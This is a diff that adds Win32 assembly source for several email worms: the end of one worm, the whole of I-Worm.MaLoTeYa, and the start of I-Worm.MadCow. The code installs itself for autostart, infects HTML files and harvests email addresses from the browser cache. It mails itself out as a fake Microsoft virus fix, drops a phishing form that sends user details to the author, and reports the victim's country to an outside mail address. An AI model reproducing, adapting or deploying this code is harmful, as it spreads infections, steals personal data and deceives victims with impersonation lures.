ptr [fhandle] + api CreateFileMappingA + or eax,eax + jz Open&MapFileCloseFileHandle + mov dword ptr [maphandle],eax + + xor ebx,ebx + push ebx + push ebx + push ebx + push FILE_MAP_WRITE + push eax + api MapViewOfFile + or eax,eax + jz Open&MapFileCloseMapHandle + mov dword ptr [mapaddress], eax + clc + ret + +Open&MapFileUnmapView: + push dword ptr [mapaddress] + api UnmapViewOfFile + +Open&MapFileCloseMapHandle: + push dword ptr [maphandle] + api CloseHandle + +Open&MapFileCloseFileHandle: + push dword ptr [fhandle] + api CloseHandle +Open&MapFileError: + stc + ret + +;...................... Search Personal Documents ............................ +;............................................................................. + +; OUT - Personal Doc Path in Mem in $ [PersoDocListe] + +PersonalDocSearch: + xor eax,eax + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push PersoFileSize + push eax ; System decide where + api VirtualAlloc + test eax, eax + je PersonalDocSearchError + mov dword ptr[PersoDocListe], eax + + call Clear_TempPath&Name + + push 00h + push 05h ; Personal Path + push offset TempPath&Name + push 00h + api SHGetSpecialFolderPathA + + push offset TempPath&Name + api SetCurrentDirectoryA ; Selected dir = Personal Path + + lea eax, FindPersonalFile + mov dword ptr[RoutineToCall], eax + call AllSubDirSearch ; Action = FindPersonalFile +PersonalDocSearchError: + ret + +;.............. Search Personal File + +FindPersonalFile: + cmp dword ptr[NbPersonalFound], NbPersoWanted ; Enought Perso File + je NoMorePersonalFile + + push offset search + @pushsz "*.doc" + api FindFirstFileA + + mov dword ptr [PersonalSearchHandle], eax + inc eax + jz NoMorePersonalFile + +PersonalDocumentFound: + mov edi, dword ptr[PersoDocListe] + mov edx, dword ptr[NbPersonalFound] + rol edx, 8 + add edi, edx ; Right Pos + + push edi + push 260 + api GetCurrentDirectoryA ; The dir + + @pushsz '\' + push edi + api lstrcat ; The \ + + push offset [search.FileName] + push edi + api lstrcat ; The Name + + inc dword ptr[NbPersonalFound] ; Next One + cmp dword ptr[NbPersonalFound], NbPersoWanted ; Enought Perso File + je EnoughtPerso + +FindPersonalFileNext: + push offset search + push dword ptr [PersonalSearchHandle] + api FindNextFileA + + test eax, eax + jnz PersonalDocumentFound + +EnoughtPerso: + push dword ptr [PersonalSearchHandle] + api FindClose + +NoMorePersonalFile: + ret + +;.............. Search in all Sub Dir + Action in ............................ + +; IN: - Root dir Selected for the Search begin +; - RoutineToCall = SeekHtmlCurrentDir +; OUT: - What perform RoutineToCall in all subdir of selected Root + + +AllSubDirSearch: + xor ebx,ebx + +FindFirstDir: + lea edi, search + push edi + @pushsz "*.*" + api FindFirstFileA + + mov dword ptr [RecSearchHandle],eax + + inc eax + jz FirstDirNotFound + +DirTravel: + bt word ptr[search.FileAttributes],4 + jnc FindNextDir + + lea eax,[search.FileName] + + cmp byte ptr [eax],"." + jz FindNextDir + + push eax + api SetCurrentDirectoryA + +InNewDir_Action: + pushad + call dword ptr[RoutineToCall] ; THE Action + popad + + push dword ptr [RecSearchHandle] + inc ebx + jmp FindFirstDir +FindNextDir: + push edi + push dword ptr [RecSearchHandle] + api FindNextFileA + + or eax,eax + jnz DirTravel + +FirstDirNotFound: + @pushsz ".." + api SetCurrentDirectoryA + + or ebx,ebx + jz AllSubDirSearchEnd + + dec ebx + pop dword ptr [RecSearchHandle] + jmp FindNextDir + +NextDirNotFound: + push dword ptr [RecSearchHandle] + api FindClose + jmp FirstDirNotFound + +AllSubDirSearchEnd: + ret + +;.......................... Random Number .................................... + +; IN: Edi +; OUT: Random Number in EDX: 0 <-> Edi-1 + +GetRndNumber: + push eax ebx ecx esi esp ebp + + mov eax, dword ptr[RandomNb] + mov ecx,41C64E6Dh + mul ecx + add eax,00003039h + mov dword ptr[RandomNb], eax + + xor edx, edx + div edi ; Reste < Edi in EDX + + pop ebp esp esi ecx ebx eax + ret + +;......................... Free The Mem ...................................... + +FreeTheMem: + mov ecx, dword ptr[EmailList] + jecxz FreeTheMemNext1 + call MemFreeIt + +FreeTheMemNext1: + mov ecx, dword ptr[MemMessageBody1] + jecxz FreeTheMemNext2 + call MemFreeIt + +FreeTheMemNext2: + mov ecx, dword ptr[PersoDocListe] + jecxz FreeTheMemFin + call MemFreeIt + +FreeTheMemFin: + ret + +MemFreeIt: + push 00008000h ; MEM_RELEASE + push 0 + push ecx + api VirtualFree + ret + +;..................... Clear TempPath & Name ................................. + +Clear_TempPath&Name: + xor al,al + mov ecx,260 + lea edi,TempPath&Name ; Clear the path + rep stosb + ret + +;..................... Encode File Base 64 ................................... + +; IN: Path of the file in offset MyPath +; OUT: Encoded file in Mem + +CodeB64File: + +OpenFileToEncode: + xor eax,eax + push eax + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push eax + push FILE_SHARE_READ + push GENERIC_READ + push Offset MyPath ; The file to encode + api CreateFileA + inc eax + je CodeB64FileEnd + dec eax + mov dword ptr [TempFileHandle], eax + +GetFileToEncodeSize: + push 0 + push eax + api GetFileSize + inc eax + je CodeB64FileEnd + dec eax + mov dword ptr [OurSizeToEncode], eax + + add eax, 1000 ; Security + +GetMemToReadFileToEncode: + xor ebx,ebx + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push eax + push ebx ; System decide where + api VirtualAlloc + test eax, eax + je CodeB64FileEnd + mov dword ptr[MemToEncode], eax + +ReadFileToEncode: + push 00h + push offset ByteReaded + push dword ptr [OurSizeToEncode] + push eax + push dword ptr [TempFileHandle] + api ReadFile + + push dword ptr [TempFileHandle] + api CloseHandle + +GetMemToEncodeFile: + mov eax, dword ptr [OurSizeToEncode] + rol eax, 4 ; We need ori size *3 (+security) + xor ebx,ebx + push PAGE_READWRITE ; read/write page + push MEM_RESERVE or MEM_COMMIT + push eax + push ebx ; System decide where + api VirtualAlloc + test eax, eax + je CodeB64FileEnd + mov dword ptr[MemEncoded], eax + +AlignFileToEncodeSize: + mov eax, dword ptr [OurSizeToEncode] + push 3 + pop ecx + xor edx,edx + push eax + div ecx + pop eax + sub ecx,edx + add eax,ecx ; align size to 3 + +EncodeFileNow: + xchg eax,ecx + mov edx,dword ptr [MemEncoded] + mov eax,dword ptr [MemToEncode] + call encodeBase64 + + mov dword ptr [EncodedFileSize],ecx + +CodeB64FileEnd: + ret + + +;................... Encode Base 64 Algorithme ............................... + +encodeBase64: ; By Bumblebee +; input: +; EAX = Address of data to encode +; EDX = Address to put encoded data +; ECX = Size of data to encode +; output: +; ECX = size of encoded data +; + xor esi,esi + call over_enc_table + db "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + db "abcdefghijklmnopqrstuvwxyz" + db "0123456789+/" +over_enc_table: + pop edi + push ebp + xor ebp,ebp +baseLoop: + movzx ebx,byte ptr [eax] + shr bl,2 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + mov bx,word ptr [eax] + xchg bl,bh + shr bx,4 + mov bh,0 + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + mov bx,word ptr [eax] + xchg bl,bh + shr bx,6 + xor bh,bh + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + + inc eax + xor ebx,ebx + movzx ebx,byte ptr [eax] + and bl,00111111b + mov bh,byte ptr [edi+ebx] + mov byte ptr [edx+esi],bh + inc esi + inc eax + + inc ebp + cmp ebp,24 + jna DontAddEndOfLine + + xor ebp,ebp + mov word ptr [edx+esi],0A0Dh + inc esi + inc esi + test al,00h + org $-1 +DontAddEndOfLine: + inc ebp + sub ecx,3 + or ecx,ecx + jne baseLoop + + mov ecx,esi + add edx,esi + pop ebp + ret + +;----------------------------------------------------------------------------- +;------------------------------ Data Zone ------------------------------------ +;----------------------------------------------------------------------------- + +.data + + +;-------------------------- Variables Zone ----------------------------------- + +SmtpFlag db 0 ; Select Mapi or Smtp +PayloadFlag db 0 ; Payload = 1 +UserEmailFoundFlag db 0 ; found = 1 + +;...................... Encode B64 Variables + +EncodedFileSize dd 0 +MemEncoded dd 0 +MemToEncode dd 0 +OurSizeToEncode dd 0 +ByteReaded dd 0 + +;...................... Email SMTP Variables + +Reg dd 1 ; String +KeySize dd 0 ; Size to read with SHGetValue + ; (init it + return effectiv lenght read in) + +AccountKey db 'Software\Microsoft\Internet Account Manager\Accounts\' +AccountSubKey db 64 dup (0) + +SmtpServeur db 64 dup (0) ; smtp server found with regkey + + +wsocket dw 2 ; sin_family ever AF_INET + dw ? ; the port +ServeurIP dd ? ; addr of server node + db 8 dup (?) ; not used + + +hSocket dd 0 ; Socket Handle + +ServeurReply dd ? ; error code +ServeurReplyEnd db ? ; byte for LF + + +CRLF equ <13,10> + +cmd_helo db 'HELO Support',CRLF +cmd_mailfrom db 'MAIL FROM:<' +cmd_rcptto db 'RCPT TO:<' + +cmd_data db 'DATA',CRLF +cmd_term db CRLF,'.',CRLF +cmd_quit db 'QUIT',CRLF + + +MemMessageBody1 dd 0 ; Ptr on Mem where built header +MessageSize1 dd 0 ; Size Header + bordel Mime + +MessageBody1: db 'Mime-Version: 1.0',CRLF + db 'Content-Type: multipart/mixed; boundary="--123"',CRLF,CRLF + + db '----123',CRLF + db 'Content-Type: text/plain; charset=us-ascii',CRLF + db 'Content-Transfer-Encoding: 7bit',CRLF,CRLF,0 + + ; Text part + +MessageBody1b: db '----123',CRLF + db 'Content-Type: application/octet-stream; name=',0 ; filename part +MessageBody1c: db 'Content-Transfer-Encoding: base64',CRLF + db 'Content-Disposition: attachment; filename=',0 ; filename part + + ; Encoded part + +MessageBody2: db 10,'--123--',CRLF +MessageSize2 equ $-MessageBody2 + + +RndFileName1 db '"SETUP.EXE"',0 +RndFileName2 db '"HGAME.EXE"',0 +RndFileName3 db '"MININET.EXE"',0 +RndFileName4 db '"NETAV.EXE"',0 +RndFileNameTb dd offset RndFileName1, offset RndFileName4, offset RndFileName3 + dd offset RndFileName4, offset RndFileName2 +NbRndFileName equ ($-offset RndFileNameTb)/4 + +RndText1: db 'Hi ',CRLF + db 'Here is what you asked, bye. ',CRLF,0 +RndText2: db 'Hello ',CRLF + db 'Maybe you could help me with this, bye. ',CRLF,0 +RndText3: db 'Hello ',CRLF + db 'Now you can try it, bye. ',CRLF,0 + +RndTextTb dd offset RndText1, offset RndText2, offset RndText3 +NbRndText equ ($-offset RndTextTb)/4 + +RndSubject1 db 'Hello',0 +RndSubject2 db 'For you',0 +RndSubject3 db 'Try it',0 +RndSubject4 db 'Re:',0 +RndSubjectTb: dd offset RndSubject2, offset RndSubject1, offset RndSubject4 + dd offset RndSubject3, offset RndSubject4 +NbSubject equ ($-offset RndSubjectTb)/4 + +RndFromName1 db 'morgan',0 +RndFromName2 db 'mick',0 +RndFromName3 db 'carla',0 +RndFromName4 db 'eva',0 +RndFromNameTb: dd offset RndFromName1, offset RndFromName2, offset RndFromName3 + dd offset RndFromName4 +NbFromName equ ($-offset RndFromNameTb)/4 + +RndFromServ1 db '@caramail.com',0 +RndFromServ2 db '@hotmail.com',0 +RndFromServ3 db '@aol.com',0 +RndFromServTb: dd offset RndFromServ1, offset RndFromServ2, offset RndFromServ3 +NbFromServ equ ($-offset RndFromServTb)/4 + + +;...................... Email MAPI Variables + +IConnectedStateTemp dd 0 ; For InternetConnectedState + +MapiMessage equ $ + dd ? + dd offset subject + dd offset textmail + dd ? + dd offset date + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset MapiFileDesc + +MsgFrom equ $ + dd ? + dd ? + dd offset namefrom + dd offset mailfrom + dd ? + dd ? + +MsgTo equ $ + dd ? + dd 1 + dd offset nameto + dd offset CurrentEmail + dd ? + dd ? + +MapiFileDesc equ $ + dd ? + dd ? + dd ? + dd offset MyPath ; File to attache + dd ? + dd ? + +CurrentEmail db EmailSize dup (0) +MAPISession dd 0 + +subject db 'Hello',0 + +date db '',0 + +namefrom db '',0 + +mailfrom db EmailSize dup (0) + +nameto db '',0 + +textmail db 'Hi ',CRLF + db 'Here is what you asked, bye... ',0 + + +;...................... Residency + Dump Variables + +MutexHdl dd 0 +MyPath db 260 dup (0) +TempFileHandle dd 0 +ByteWritten dd 0 + +;...................... Email Search Variables + +NbEmailFound dd 0 ; Compte combien d'email found +EmailList dd 0 ; Ptr zone Mem ou stocker Emails + +TempPath&Name db 260 dup (0) + +fhandle dd 0 ; To find & map file +mapaddress dd 0 +maphandle dd 0 + +maphandlemail dd 0 ; for html found +esi_save dd 0 +EmailCurrentPos dd 0 + +RandomNb dd 0 ; Init with GettickCount + +NbWabEmail dd 0 ; Nb emails in *.Wab + +;...................... Recursive Search Variables + +RecSearchHandle dd 0 ; For the Recursive search +RoutineToCall dd 0 ; Ptr on routine to execute in all SubDir + +PersonalSearchHandle dd 0 ; For personal doc search +NbPersonalFound dd 0 ; Nb Personal doc found +PersoDocListe dd 0 ; Ptr zone Mem ou stocker Path Doc Perso + +;--------------------------- Structures Zone --------------------------------- + +;...................... Search File Structure + +filetim struct +FT_dwLowDateT dd ? +FT_dwHighDateT dd ? +filetim ends + +w32fd struct +FileAttributes dd ? +CreationTime filetim ? +LastAccessTime filetim ? +LastWriteTime filetim ? +FileSizeHigh dd ? +FileSizeLow dd ? +Reserved0 dd ? +Reserved1 dd ? +FileName db 260 dup (0) +AlternateFileN db 13 dup (?) + db 3 dup (?) +w32fd ends + +search w32fd ? + +;...................... System Time Structure + +SystemTimeData equ $ +STDYear dw ? +STDMonth dw ? +STDDayOfWeek dw ? +STDDay dw ? +STDHour dw ? +STDMinute dw ? +STDSecond dw ? +STDMilliseconds dw ? + +;...................... Sockets Structure + +WSAData equ $ + dw ? + dw ? + db 257 dup (?) + db 129 dup (?) + dw ? + dw ? + dd ? + + +end Mv + diff --git a/Win32/I-Worm.MaLoTeYa.asm b/Win32/I-Worm.MaLoTeYa.asm new file mode 100644 index 00000000..c67978ef --- /dev/null +++ b/Win32/I-Worm.MaLoTeYa.asm @@ -0,0 +1,754 @@ +comment # +Name : I-Worm.MaLoTeYa +Author : PetiK +Date : July 2nd - July 6th +Size : 12288 byte + +Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the +run= line and creates the VARegistered.htm file in the StartUp folder. This file send some +informations to petik@multimania.com and displays a fake message. +If the version of the platform is Windows 95/98, the file is a service process. +It infects all *.htm and *.html file while writing at the end a VB script. It checks after +if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files" +to find some EMail addreses and send a copy of itself. The worms sends equally an email to +"petik@multimania.com" with the country of the user. When the user want to see the +system properties, the title of the window is changed by "PetiK always is with you :-)". + +Greets to Benny, ZeMacroKiller98, Mandragore. + +tasm32 /M /ML Maloteya +tlink32 -Tpe -aa -x Maloteya,,,import32 + +# + +.586p +.model flat +.code + +JUMPS + +callx macro a +extrn a:proc +call a +endm + +include useful.inc + +;---------------------------------------- +;Installation of the worm in the computer +;---------------------------------------- +DEBUT: +VERIF: push 00h + callx GetModuleFileNameA + push 50h + push offset szOrig + push eax + callx GetModuleFileNameA + + push 50h + push offset szCopie + callx GetWindowsDirectoryA + @pushsz "\RUNW32.EXE" + push offset szCopie + callx lstrcat + + push 50h + push offset szCopb + callx GetSystemDirectoryA + @pushsz "\MSVA.EXE" + push offset szCopb + callx lstrcat + + push offset szOrig + push offset szCopie + callx lstrcmp + test eax,eax + jz CACHE + +COPIE: push 00h + push offset szCopie + push offset szOrig + callx CopyFileA + push 00h + push offset szCopb + push offset szOrig + callx CopyFileA + +WININI: push 50 + push offset szWinini + callx GetWindowsDirectoryA + @pushsz "\\WIN.INI" + push offset szWinini + callx lstrcat + push offset szWinini + push offset szCopie + @pushsz "run" + @pushsz "windows" + callx WritePrivateProfileStringA + +;-------------------------------------------------- +;Create VARegistered.htm file in the StartUp folder +;-------------------------------------------------- +C_GET: @pushsz "SHELL32.dll" + callx LoadLibraryA + mov SHELLhdl,eax + @pushsz "SHGetSpecialFolderPathA" + push SHELLhdl + callx GetProcAddress + mov getfolder,eax + push 00h + push 07h ; STARTUP Folder + push offset StartUp + push 00h + call [getfolder] + test eax,eax + je F_HTM + @pushsz "\VARegistered.htm" + push offset StartUp + callx lstrcat + +HTM: push 00h + push 80h + push 02h + push 00h + push 01h + push 40000000h + push offset StartUp + callx CreateFileA + mov [FileHdl],eax + push 00h + push offset octets + push HTMTAILLE + push offset htmd + push [FileHdl] + callx WriteFile + push [FileHdl] + callx CloseHandle +F_HTM: push [SHELLhdl] + callx FreeLibrary + +F_MESS: push 1000 + callx Sleep + push 1040h + @pushsz "Microsoft Virus Alert" + @pushsz "Your system does not appear infected with I-Worm.Magistr" + push 00h + callx MessageBoxA + jmp FIN + +;---------------------------------- +;Serivice process for Windows 95/98 +;---------------------------------- +CACHE: @pushsz "KERNEL32.dll" + callx GetModuleHandleA + @pushsz "RegisterServiceProcess" + push eax + callx GetProcAddress + xchg ecx,eax + jecxz D_INF + push 01h + push 00h + call ecx + +D_INF: push 50 + push offset szCurrent + callx GetCurrentDirectoryA + push offset szCurrent + callx SetCurrentDirectoryA + +;--------------------------------------------- +;Infect all *.htm* files of the Windows folder +;--------------------------------------------- +FFF: push offset Search + @pushsz "*.htm*" ; Search some *.htm* files... + callx FindFirstFileA + inc eax + je F_INF + dec eax + mov [htmlHdl],eax + +i_file: call infect ; and infect them + + push offset Search + push [htmlHdl] + callx FindNextFileA + test eax,eax + jne i_file + push [htmlHdl] + callx FindClose +F_INF: + +;----------------------- +; Check if we r conected +;----------------------- +NET1: @pushsz "WININET.dll" + callx LoadLibraryA + test eax,eax + jz FIN + mov WNEThdl,eax + @pushsz "InternetGetConnectedState" + push WNEThdl + callx GetProcAddress + test eax,eax + jz FIN + mov netcheck,eax + jmp NET2 +NET2: push 00h + push offset Temp + call [netcheck] ; Connect to Internet ?? + dec eax + jnz NET2 +FINNET: push [WNEThdl] + callx FreeLibrary + +PAYS: push 50 + push offset szSystemini + callx GetWindowsDirectoryA + @pushsz "\Win.ini" + push offset szSystemini + callx lstrcat + push offset szSystemini + push 20 + push offset org_pays + push offset Default + @pushsz "sCountry" + @pushsz "intl" + callx GetPrivateProfileStringA + +;------------------------------------------------------------------ +; Send the name of country to "petik@multomania.com" (perhaps bugs) +;------------------------------------------------------------------ +SMTP: push offset WSA_Data ; Winsock + push 0101h ; ver 1.1 (W95+) + callx WSAStartup + or eax,eax + jnz INIT + + @pushsz "obelisk.mpt.com.uk" + callx gethostbyname ; convert SMTP Name to an IP address + xchg ecx,eax + jecxz FREE_WIN ; Error ? + mov esi,[ecx+12] ; Fetch IP address + lodsd + push eax + pop [ServIP] + + push 00h ; Create Socket + push 01h ; SOCK_STREAM + push 02h ; AF_INET + callx socket + mov work_socket,eax + inc eax + jz FREE_WIN + + push 16 ; Sze of connect strucure + call @1 ; Connect structure + dw 2 ; Family + db 0, 25 ; Port number + ServIP dd 0 ; IP of server + db 8 dup(0) ; Unused + @1: + push [work_socket] + callx connect + inc eax + jz CLOSE_SOC + + lea esi,Send_M + mov bl,6 + + Command_Loop: xor eax,eax + + call @2 ; Time-out: + Time_Out: dd 5 ; Seconds + dd 0 ; Milliseconds + @2: + push eax ; Not used (Error) + push eax ; Not used (Writeability) + call @3 + Socket_Set: dd 1 ; Socket count + work_socket dd 0 ; Socket + @3: + push eax ; Unused + callx select + dec eax + jnz CLOSE_SOC + + push 00h + push 512 ; Received data from socket + push offset buf_recv + push [work_socket] + callx recv + xchg ecx,eax ; Connection closed ? + jecxz CLOSE_SOC + inc ecx ; Error ? + jz CLOSE_SOC + or ebx,ebx ; Received stuff was QUIT + jz CLOSE_SOC ; reply ? then close up. + mov al,'2' ; "OK" reply + + cmp bl,2 ; Received stuff was the DATA + jne Check_Reply ; reply ? + inc eax + Check_Reply: scasb + je Wait_Ready + + lea esi,Send_M + (5*4) + mov bl,1 + + Wait_Ready: + xor ecx,ecx + lea eax,Time_Out + push eax + push ecx ; not used (Error) + lea eax,Socket_Set + push eax ; Writeability + push ecx ; Not used (Readability) + push ecx ; Unused + callx select + dec eax ; Time-ouit ?? + jnz CLOSE_SOC + + cld + lodsd + + movzx ecx,ax + shr eax,16 + add eax,ebp + + push ecx ; Send command and data to the socket + push 00h + push ecx ; Size of buffer + push eax ; Buffer + push [work_socket] + callx send + pop ecx + cmp eax,ecx + jne CLOSE_SOC + dec ebx + jns Command_Loop + +CLOSE_SOC: + push [work_socket] + callx closesocket +FREE_WIN: + callx WSACleanup + + +INIT: @pushsz "MAPI32.dll" + callx LoadLibraryA + test eax,eax + jz FIN + mov MAPIhdl,eax + @pushsz "MAPISendMail" + push MAPIhdl + callx GetProcAddress + test eax,eax + jz FIN + mov sendmail,eax + +D_GET: @pushsz "SHELL32.dll" + callx LoadLibraryA + mov SHELLhdl,eax + @pushsz "SHGetSpecialFolderPathA" + push SHELLhdl + callx GetProcAddress + mov getfolder,eax + push 00h + push 20h ; MSIE Cache Folder + push offset Cache + push 00h + call [getfolder] + push [SHELLhdl] + callx FreeLibrary + push offset Cache + callx SetCurrentDirectoryA + +;----------------------------------------------------------- +; Search email addresses into the "Temporary Internet Files" +;----------------------------------------------------------- +FFF2: push offset Search + @pushsz "*.htm*" + callx FindFirstFileA + inc eax + je END_SPREAD + dec eax + mov [htmlHdl],eax + +i_htm: call infect2 + + push offset Search + push [htmlHdl] + callx FindNextFileA + test eax,eax + jne i_file + push [htmlHdl] + callx FindClose + +END_SPREAD: + push [MAPIhdl] + callx FreeLibrary + +;--------------------------------------------------------------- +; Changes the title of the System Properties window on Wednesday +;--------------------------------------------------------------- +DATE: push offset SystemTime + callx GetSystemTime + cmp [SystemTime.wDayOfWeek],3 + jne FIN +WIN1: @pushsz "Proprits Systme" + push 00h + callx FindWindowA + test eax,eax + jz WIN2 + jmp WIN3 +WIN2: @pushsz "System Properties" ; Change title some windows + push 00h + callx FindWindowA + test eax,eax + jz WIN1 +WIN3: mov edi,eax + @pushsz "PetiK always is with you :-)" + push edi + callx SetWindowTextA + jmp WIN1 + +FIN: push 00h + callx ExitProcess + +infect: pushad + mov esi,offset Search.cFileName + push esi + callx GetFileAttributesA + cmp eax,1 + je end_infect + push 00h + push 80h + push 03h + push 00h + push 01h + push 40000000h + push esi + callx CreateFileA + xchg eax,edi + inc edi + je end_infect + dec edi + push 02h ; FILE_END + push 00h + push [Dist] + push edi + callx SetFilePointer + push 00h + push offset octets + push HTMSIZE + push offset d_htm + push edi + callx WriteFile + push edi + callx CloseHandle + push 01h ; READONLY + push esi + callx SetFileAttributesA +end_infect: popad + ret + +infect2:pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + push offset Search.cFileName + inc eax + je END_SPREAD + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 02h ; PAGE_READONLY + push eax + push ebx + callx CreateFileMappingA + test eax,eax + je F1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 04h ; FILE_MAP_READ + push ebp + callx MapViewOfFile + test eax,eax + je F2 + xchg eax,esi + + push 00h + push ebx + callx GetFileSize + xchg eax,ecx + jecxz F3 + +d_scan_mail: + call @melto + db 'mailto:' +@melto: pop edi +scn_mail: + pushad + push 07h + pop ecx + rep cmpsb + popad + je scan_mail + inc esi + loop scn_mail + +F3: push esi + callx UnmapViewOfFile +F2: push ebp + callx CloseHandle +F1: push ebx + callx CloseHandle + popad + ret + +scan_mail: + xor edx,edx + add esi,7 ; size of the string "mailto:" + mov edi,offset m_addr + push edi +p_car: lodsb ; next character + cmp al,' ' ; space ?? + je car_s + cmp al,'"' ; end character ?? + je car_f + cmp al,'''' ; end character ?? + je car_f + cmp al,'@' ; @ character ?? + jne not_a + inc edx +not_a: stosb + jmp p_car ; jmp to nxt char +car_s: inc esi + jmp p_car +car_f: xor al,al + stosb + pop edi + test edx,edx ; exist @ ?? + je d_scan_mail + call ENVOIE + jmp d_scan_mail + + +ENVOIE: xor eax,eax + push eax + push eax + push offset Message + push eax + push [MAPIh] + call [sendmail] + ret + +.data +namer db 50 dup (0) +szCopb db 50 dup (0) +szCopie db 50 dup (0) +szCurrent db 50 dup (0) +szOrig db 50 dup (0) +szSystemini db 50 dup (0) +szWinini db 50 dup (0) +Cache db 70 dup (0) +StartUp db 70 dup (0) +m_addr db 128 dup (?) +WSA_Data db 400 dup (0) +buf_recv db 512 dup (0) +Default db 0 +FileHdl dd ? +octets dd ? +netcheck dd ? +sendmail dd ? +getfolder dd ? +htmlHdl dd ? +MAPIhdl dd ? +SHELLhdl dd ? +WNEThdl dd ? +RegHdl dd ? +Dist dd 0 +Temp dd 0 +MAPIh dd 0 +WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h +Origine db "Made In France",00h + + + +Message dd ? + dd offset sujet + dd offset corps + dd ? + dd offset date + dd ? + dd 2 ; MAPI_RECEIPT_REQUESTED ?? + dd offset MsgFrom + dd 1 ; MAPI_UNREAD ?? + dd offset MsgTo + dd 1 + dd offset AttachDesc + +MsgFrom dd ? + dd ? + dd offset NameFrom + dd offset MailFrom + dd ? + dd ? + +MsgTo dd ? + dd 1 ; MAIL_TO + dd offset NameTo + dd offset m_addr + dd ? + dd ? + +AttachDesc dd ? + dd ? + dd ? ; character in text to be replaced by attachment + dd offset szCopb ; Full path name of attachment file + dd ? + dd ? + +sujet db "New Virus Alert !!",00h +corps db "This is a fix against I-Worm.Magistr.",0dh,0ah + db "Run the attached file (MSVA.EXE) to detect, repair and " + db "protect you against this malicious worm.",00h +date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM +NameFrom db "Microsoft Virus Alert" +MailFrom db "virus_alert@microsoft.com",00h +NameTo db "Customer",00h + +Send_M: dw fHELO-dHELO + dw fFROM-dFROM + dw fRCPT-dRCPT + dw fDATA-dDATA + dw fMAIL-dMAIL + dw fQUIT-dQUIT + + dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah + fHELO: + dFROM db 'MAIL FROM:',0dh,0ah + fFROM: + dRCPT db 'RCPT TO:',0dh,0ah + fRCPT: + dDATA db 'DATA',0dh,0ah + fDATA: + dMAIL: db 'From: "MaLoTeYa",',0dh,0ah + db 'Subject: Long Live the Worm',0dh,0ah + db 'Pays d''origine : ' + org_pays db 20 dup (0) + db '',0dh,0ah + db '.',0dh,0ah + fMAIL: + dQUIT db 'QUIT',0dh,0ah + fQUIT: + +htmd: db "Virus Alert Registration",0dh,0ah + db "",0dh,0ah + db "",0dh,0ah + db "

Microsoft Virus Alert Registration

",0dh,0ah + db "

Please fill out this form. ",0dh,0ah + db "You must be connected to internet.

",0dh,0ah + db "

",0dh,0ah + db "
",0dh,0ah + db "

Name :

",0dh,0ah + db "

Firstname :

",0dh,0ah + db "

City :

",0dh,0ah + db "

Country :

",0dh,0ah + db "

E-Mail :

",0dh,0ah + db "

",0dh,0ah + db "

",0dh,0ah + db "

AFTER REGISTRATION YOU CAN DELETE THIS FILE

",0dh,0ah + db "
",00h +HTMTAILLE equ $-htmd + +d_htm: db "",0dh,0ah,0dh,0ah + db "",0dh,0ah +HTMSIZE equ $-d_htm + +OSVERSIONINFO struct +dwOSVersionInfoSize dd ? +dwMajorVersion dd ? +dwMinorVersion dd ? +dwBuildNumber dd ? +dwPlatformId dd ? +szCSDVersion db 128 dup (?) +OSVERSIONINFO ends + +SYSTIME struct +wYear WORD ? +wMonth WORD ? +wDayOfWeek WORD ? +wDay WORD ? +wHour WORD ? +wMinute WORD ? +wSecond WORD ? +wMillisecond WORD ? +SYSTIME ends + +MAX_PATH equ 260 + +FILETIME struct +dwLowDateTime dd ? +dwHighDateTime dd ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes dd ? +ftCreationTime FILETIME ? +ftLastAccessTime FILETIME ? +ftLastWriteTime FILETIME ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved0 dd ? +dwReserved1 dd ? +cFileName dd MAX_PATH (?) +cAlternateFileName db 13 dup (?) + db 3 dup (?) +WIN32_FIND_DATA ends + +OSVer OSVERSIONINFO <> +SystemTime SYSTIME <> +Search WIN32_FIND_DATA <> + +end DEBUT +end diff --git a/Win32/I-Worm.MadCow.asm b/Win32/I-Worm.MadCow.asm new file mode 100644 index 00000000..7eca41cb --- /dev/null +++ b/Win32/I-Worm.MadCow.asm @@ -0,0 +1,353 @@ +comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000 + +Pour assembler : tasm32 /M /ML madcow.asm + tlink32 -Tpe -aa -x madcow.obj,,,import32.lib * + +jumps +locals +.386 +.model flat,stdcall + +;KERNEL32.dll +extrn lstrcat:PROC +extrn WritePrivateProfileStringA:PROC +extrn CloseHandle:PROC +extrn CopyFileA:PROC +extrn CreateDirectoryA:PROC +extrn CreateFileA:PROC +extrn DeleteFileA:PROC +extrn ExitProcess:PROC +extrn GetModuleFileNameA:PROC +extrn GetModuleHandleA:PROC +extrn GetSystemDirectoryA:PROC +extrn GetWindowsDirectoryA:PROC +extrn MoveFileA:PROC +extrn WinExec:PROC +extrn WriteFile:PROC + +;ADVAPI32.dll +extrn RegSetValueExA:PROC +extrn RegCreateKeyExA:PROC +extrn RegCloseKey:PROC + +.data +regDisp dd 0 +regResu dd 0 +l dd 0 +p dd 0 +fh dd 0 +octets dd ? +szOrig db 260 dup (0) +szOrig2 db 260 dup (0) +szCopie db 260 dup (0) +szCopi2 db 260 dup (0) +szCico db 260 dup (0) +szWin db 260 dup (0) +Dossier db "C:\Win32",00h +fichier db "C:\Win32\Salut.ico",00h +Copico db "\MSLS.ICO",00h +Copie db "\Wininet32.exe",00h +Copie2 db "\MadCow.exe",00h +BATFILE db "C:\Win32\ENVOIE.BAT",00h +VBSFILE db "C:\Win32\ENVOIE.VBS",00h 